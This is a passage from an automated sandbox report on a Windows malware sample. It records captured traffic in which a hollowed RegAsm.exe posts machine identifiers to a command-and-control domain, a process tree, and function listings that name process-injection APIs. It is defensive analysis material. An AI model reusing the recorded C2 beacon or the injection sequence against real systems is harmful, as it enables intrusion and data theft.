2024-11-08 11:02:41 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 11:02:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49794	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:42 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NT0XG1U7R7VR3RVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1140 Host: knifedxejsu.cyou
2024-11-08 11:02:42 UTC	1140	OUT	Data Raw: 2d 2d 4e 54 30 58 47 31 55 37 52 37 56 52 33 52 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 33 45 30 42 46 45 42 30 31 44 36 30 41 34 41 30 39 39 43 43 30 30 35 45 35 41 32 30 33 36 43 0d 0a 2d 2d 4e 54 30 58 47 31 55 37 52 37 56 52 33 52 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 54 30 58 47 31 55 37 52 37 56 52 33 52 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d Data Ascii: --NT0XG1U7R7VR3RVVVVVVContent-Disposition: form-data; name="hwid"23E0BFEB01D60A4A099CC005E5A2036C--NT0XG1U7R7VR3RVVVVVVContent-Disposition: form-data; name="pid"1--NT0XG1U7R7VR3RVVVVVVContent-Disposition: form-data; name="lid"HpOoIh-
2024-11-08 11:02:43 UTC	1009	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kqpmnojrgkafpnmd4hr4gp0kan; expires=Tue, 04-Mar-2025 04:49:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ru%2Fb8YZhDYLV74UoiD3BR0a2pCanSFrMWGBbKUqKZczJbBeI5g3NAdrIJzzfbdaMerQ%2FMs9274C8MiZRCGRwmhs%2FHFZssGgYvD41yuo6LjfwSRbXAIwaddkQLl1lx38neSvg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df5128509652d4a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1521&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2059&delivery_rate=1909030&cwnd=251&unsent_bytes=0&cid=e070a181bc8f74c5&ts=1276&x=0"
2024-11-08 11:02:43 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 11:02:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:02:27
Start date:	08/11/2024
Path:	C:\Users\user\Desktop\TZ33WZy6QL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TZ33WZy6QL.exe"
Imagebase:	0x2e0000
File size:	45'056 bytes
MD5 hash:	AA167E9969D9B0DC9A2F2936BD397F31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:02:30
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline"
Imagebase:	0xad0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:02:30
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:02:31
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP"
Imagebase:	0x50000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:02:31
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0xc70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	114
Total number of Limit Nodes:	3

Executed Functions

Function 0247280C Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02472A4E

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b9f9b51832f037eca71ee4b4e172896ac5c763e8cfe7290ed4c3e66c006d8506
Instruction ID: 3d4692328115a463cee7220a9dee10b98d2d7435478d9191701dd341a801a9e9
Opcode Fuzzy Hash: b9f9b51832f037eca71ee4b4e172896ac5c763e8cfe7290ed4c3e66c006d8506
Instruction Fuzzy Hash: D1A13B71D00759CFEB21CF68C841BEEBBB2BF48314F1485AAD859A7240DBB49985CF91

Function 02472818 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02472A4E

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 667c59b6612cb515e7d165542ecb07188b00481428e8aedf58b42e4ec8a7facd
Instruction ID: 38a2dfc0b8bafcbcf6508eb11095ac0fdb988df764c9fbeb610fb4305e0335df
Opcode Fuzzy Hash: 667c59b6612cb515e7d165542ecb07188b00481428e8aedf58b42e4ec8a7facd
Instruction Fuzzy Hash: F9914B71D003198FEB20CF69C841BEEBBB2BF48314F1485AAD859A7240DBB49985CF91

Function 02472588 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02472620

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: deb510ba240b9d4971b9b4848b94c189b5ae76942c5fe8364069bb031f01a1c5
Instruction ID: a1e8ee420c9d5ef2f37a7baebf2f42ab20100ec5022ba84855873844199b115a
Opcode Fuzzy Hash: deb510ba240b9d4971b9b4848b94c189b5ae76942c5fe8364069bb031f01a1c5
Instruction Fuzzy Hash: 11211576D003499FDB10CFA9C885BEEBBF1FF48310F14842AE959A7241C7789945CBA1

Function 02472590 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02472620

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a6eaf92e789c458edc130cca4ccffd30e5a092daa11c7d267e5e54a62bda6b61
Instruction ID: 5469e683fb25d3e07028ab984c5966d9f60db30c1ff7149ec1ea4417706543d5
Opcode Fuzzy Hash: a6eaf92e789c458edc130cca4ccffd30e5a092daa11c7d267e5e54a62bda6b61
Instruction Fuzzy Hash: DD212571D003499FDB10CFAAC885BEEBBF5FF48310F14842AE959A7240C7B89944CBA5

Function 024723F0 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02472476

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4b4c123f2876ffc48a3d9d59a89d38cf60486517e2c126dddf8cf32ed4d36680
Instruction ID: 56c60206eb588d2ea1c27ec06477aec679b746ada7a39e1d3a3e36848c2ce615
Opcode Fuzzy Hash: 4b4c123f2876ffc48a3d9d59a89d38cf60486517e2c126dddf8cf32ed4d36680
Instruction Fuzzy Hash: 2B2125729002098FDB10CFAAC585BEEBBF5AF49314F54842AD469A7240CB789945CBA1

Function 02472679 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02472700

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c6b8615e5763dcb837504701d19b5546d5cfcd87f896f12f72fb564522c96d79
Instruction ID: 2740f95f2f40728466427485d9ce28171cd9b9c867b5f3bfd6de096b08870f26
Opcode Fuzzy Hash: c6b8615e5763dcb837504701d19b5546d5cfcd87f896f12f72fb564522c96d79
Instruction Fuzzy Hash: 652116B6C006499FDB10CFA9C981BEEBBF5FF48310F54842AE959A7250C7789544CBA1

Function 02472680 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02472700

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 41995d88ba4f037373c245a5f72d912de3d7cad1f76d6ce1a9b8c0cf08b3962b
Instruction ID: 3f14c7d4b31531e81203b274b0b1ab86d90998062cc803bbb70abfe021dc6abd
Opcode Fuzzy Hash: 41995d88ba4f037373c245a5f72d912de3d7cad1f76d6ce1a9b8c0cf08b3962b
Instruction Fuzzy Hash: DC2103B18003499FDB10CFAAC881BEEBBF5FF48310F54842AE959A7240C7789944CBA1

Function 024723F8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02472476

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2c06d7671174555914c282eb68a2190745f23f9292128442eb82401f9599830b
Instruction ID: 8f2f10d3f2e4ad06407d63e8d185feaaafb1e152154d0c7437fd1da39436d1ce
Opcode Fuzzy Hash: 2c06d7671174555914c282eb68a2190745f23f9292128442eb82401f9599830b
Instruction Fuzzy Hash: 2C210471D103098FDB10DFAAC485BEEBBF4AF48314F54842AD969A7240D7B89945CBA1

Function 024724C9 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0247253E

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e0e7749a712dc1bcb3622dc5c8721afc3830a462f3d7ad2abeac40b0b05aadc
Instruction ID: ee7f52c43690375e5e736ec2db5a2260e6791a5fa5d941a9523aa1900a5fe227
Opcode Fuzzy Hash: 2e0e7749a712dc1bcb3622dc5c8721afc3830a462f3d7ad2abeac40b0b05aadc
Instruction Fuzzy Hash: BE1144728002498BDB10CFAAC855BDEFBF1EF48314F24881AE919A7250C7799545CFA1

Function 024724D0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0247253E

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f96e52f6e517d08d56a3e7e6ee0d66bba6acd05e19e9d0fcd67ab533ecf9f345
Instruction ID: 736d2dfe843aea9a655d85bf06e9d504bc297f179cd1a76dacc26a495d394ad0
Opcode Fuzzy Hash: f96e52f6e517d08d56a3e7e6ee0d66bba6acd05e19e9d0fcd67ab533ecf9f345
Instruction Fuzzy Hash: 6B1126729002499FDB10DFAAC845BDFFBF5EF48314F24841AE515A7250C7759544CBA1

Function 02472340 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,EC8B5500), ref: 024723AA

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b2ead3c1488fdbec03f5511839b7f0728d3b18113b1118fe061bfcd3e581fe4d
Instruction ID: 6b6855c5671521cc3b04ec0e6cf4dcf34423a947fb33e7c391abb4a547b8bb59
Opcode Fuzzy Hash: b2ead3c1488fdbec03f5511839b7f0728d3b18113b1118fe061bfcd3e581fe4d
Instruction Fuzzy Hash: 8A114675D002498FDB20DFAAC5457EEFBF5EB88314F24842AD429A7340C7B8A545CBA4

Function 02472348 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,EC8B5500), ref: 024723AA

Memory Dump Source

Source File: 00000000.00000002.1383155050.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_TZ33WZy6QL.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 64aa59a4c2753bf8f8eb126badc4753dc87b876a833d88c9a61f85a6566318d1
Instruction ID: 8a7650302614a8db2b5f48b155c9c01c9f5ecce613d10048e51017faa212ab08
Opcode Fuzzy Hash: 64aa59a4c2753bf8f8eb126badc4753dc87b876a833d88c9a61f85a6566318d1
Instruction Fuzzy Hash: 95112871D003498BDB10DFAAC4457DEFBF5EB88314F14842AD519A7240C7B9A544CBA5

Analysis Process: RegAsm.exePID: 4588, Parent PID: 6072COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	60.1%
Total number of Nodes:	203
Total number of Limit Nodes:	10

Executed Functions

Function 004358F0 Relevance: 32.1, APIs: 11, Strings: 7, Instructions: 569
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00442AB8,00000000,00000001,00442AA8,00000000), ref: 00435A29
SysAllocString.OLEAUT32(v'w!), ref: 00435AA5
CoSetProxyBlanket.COMBASE(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435AEB
SysAllocString.OLEAUT32(69DD6BDD), ref: 00435B67
SysAllocString.OLEAUT32(89518B21), ref: 00435C13
VariantInit.OLEAUT32(?), ref: 00435C8C

Strings

c;m5, xrefs: 00435A52
\, xrefs: 004359E6
|{, xrefs: 00435BCF
SQ, xrefs: 00435918
C, xrefs: 004359DE
v'w!, xrefs: 00435A8C
03, xrefs: 00435A62

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: 03$C$\$c;m5$v'w!$|{$SQ
API String ID: 65563702-3459701557
Opcode ID: 411b126798814c7ae31ce3f4c4342a080b9c8b96268cde334bba22632ad74ce6
Instruction ID: 8ee38e81a9ebfbdc9a92cdf509a7b5b91bc458359a7dce3f43b3968cf6a0eaab
Opcode Fuzzy Hash: 411b126798814c7ae31ce3f4c4342a080b9c8b96268cde334bba22632ad74ce6
Instruction Fuzzy Hash: B4125371A087008FE724CF24C88676BBBE5EF89714F14892EF9959B390D778D905CB86

Function 0041FDF0 Relevance: 30.6, Strings: 24, Instructions: 601
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{, xrefs: 00420367
6, xrefs: 0042003E
?, xrefs: 004200F8
=, xrefs: 00420108
!@, xrefs: 0041FE23
z, xrefs: 004205FE
x, xrefs: 0042060E
!, xrefs: 0042027F
Y, xrefs: 0042004D
z, xrefs: 0042035F
j, xrefs: 004200E0
{, xrefs: 00420606
9, xrefs: 004200E8
x, xrefs: 0042036F
<, xrefs: 00420275
$, xrefs: 00420270
x, xrefs: 0041FE9C
%, xrefs: 0042027A
l, xrefs: 004200F0
<, xrefs: 00420100
[, xrefs: 00420043
{, xrefs: 0041FE94
Z, xrefs: 00420048
z, xrefs: 0041FE8C

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: !$!@$$$%$6$9$<$<$=$?$Y$Z$[$j$l$x$x$x$z$z$z${${${
API String ID: 2994545307-1571756884
Opcode ID: 9838f81f9164a3bf6324ccc903fe796ebe23cea2d2119934c59102dedf835d59
Instruction ID: f91c82cc5f90e8b89dfc4b824f758c3499413eda674ffe0f2f419b91f75692ba
Opcode Fuzzy Hash: 9838f81f9164a3bf6324ccc903fe796ebe23cea2d2119934c59102dedf835d59
Instruction Fuzzy Hash: 7B32E27160C3908FD324CB28D4543AFBBE1ABC5314F58896ED5DA87382D7BD88468B57

Function 00421A80 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tw, xrefs: 00421ED9
uz, xrefs: 00421F8B
] @, xrefs: 00421EED
q"B, xrefs: 0042226B
sXu, xrefs: 00421ED1
{=, xrefs: 00421F93
^gPa, xrefs: 00421F74
wvy, xrefs: 00421D43
v~, xrefs: 00421FA3

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ] @$^gPa$q"B$tw$uz$v~${=$sXu$wvy
API String ID: 0-1187496957
Opcode ID: e3650dcdbb4ca8f2df992d684fb0d182d5e335e720cdf4a984b47cdda153cc4d
Instruction ID: 11580da93081b44debf38894fec1cf3a1aeec49c2061deccd092facb7d853063
Opcode Fuzzy Hash: e3650dcdbb4ca8f2df992d684fb0d182d5e335e720cdf4a984b47cdda153cc4d
Instruction Fuzzy Hash: DF02CBB45083509FE3109F25D84072BBBF0EF96758F04892DF9999B391E77889098B9B

Function 00418D6F Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 769
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

v<21, xrefs: 0041931B
j, xrefs: 00419435
/, xrefs: 0041940A
l, xrefs: 0041935D
.';", xrefs: 00419331

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .';"$j$l$v<21$/
API String ID: 0-2207827235
Opcode ID: f60d948e8d78ff1402df21f8f9092e8a93c385ac855627d3c8486739e539914c
Instruction ID: 45ccb8024782f49f4c41b897b5314fa43147df0c466e0f3adfe0f67a7a172f33
Opcode Fuzzy Hash: f60d948e8d78ff1402df21f8f9092e8a93c385ac855627d3c8486739e539914c
Instruction Fuzzy Hash: D55276B15083808BD7348F25D8957DBBBE1BFD6308F148A2DE4C99B391D7398946CB86

Function 00429C7C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00429D47
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00429D7D
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00429E29

Strings

KJI', xrefs: 0042A05F
JhZv, xrefs: 0042A236

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: JhZv$KJI'
API String ID: 2243422189-1972199893
Opcode ID: 5d78d693f0a6226f00e1cd2abe8cb442437e0ae6caaf3c50373dc2fa9a6773df
Instruction ID: 0265194c4d9e7378626be078c437357245808d6265734e5e666d7c04b72802f9
Opcode Fuzzy Hash: 5d78d693f0a6226f00e1cd2abe8cb442437e0ae6caaf3c50373dc2fa9a6773df
Instruction Fuzzy Hash: 55F1E670204B818FD725CF35D4507A3BBE2AF57304F4889ADC4EA87782D779650ACB66

Function 00429C75 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00429D7D
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00429E29

Strings

KJI', xrefs: 0042A05F
JhZv, xrefs: 0042A236

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: JhZv$KJI'
API String ID: 3545744682-1972199893
Opcode ID: e5d14e3a6780a93f6ef3399222aa12012372fe2bcf5fc96e370c7a7916d26253
Instruction ID: 45cd97e3f39545d266e0ca7d1123ce29aeaad83fbb4faaee60ad309aa47ec7e8
Opcode Fuzzy Hash: e5d14e3a6780a93f6ef3399222aa12012372fe2bcf5fc96e370c7a7916d26253
Instruction Fuzzy Hash: D2F10730304B818BD725CF35D4907A3FBE2AF96314F488A6EC4EA47786D779A40AC756

Function 0042B503 Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

}z{x, xrefs: 0042B77F

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: }z{x
API String ID: 2994545307-1935807464
Opcode ID: aa45980cbac1e231f6e8da8b68cef9a9cf92f57abf15a9337a6b543c2cf2846f
Instruction ID: c622ef9edb583b2cafb03bc8f4f9681344dbf6dda95fbb3d8b8406b624183eef
Opcode Fuzzy Hash: aa45980cbac1e231f6e8da8b68cef9a9cf92f57abf15a9337a6b543c2cf2846f
Instruction Fuzzy Hash: 1F912530204B508FD7258F28D8A07B3BBE2EF92304F59499DC0D78B252D739A815C7AD

Function 0043B600 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043F08B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B62E

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0043F880 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

@, xrefs: 0043F8E9

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 1b48745ee9b29d4670508d75d6af05d28424f9ff617e2911ae8345f7b890af72
Instruction ID: 6da14dff6695a29b7a138f1b5872fd1f2216a7a8924e699d2d19755c0f6557e7
Opcode Fuzzy Hash: 1b48745ee9b29d4670508d75d6af05d28424f9ff617e2911ae8345f7b890af72
Instruction Fuzzy Hash: 7931F0755183049BC714DF18C88176BFBF5EF89314F05A82EE9A547290E73899088BAA

Function 004247C0 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

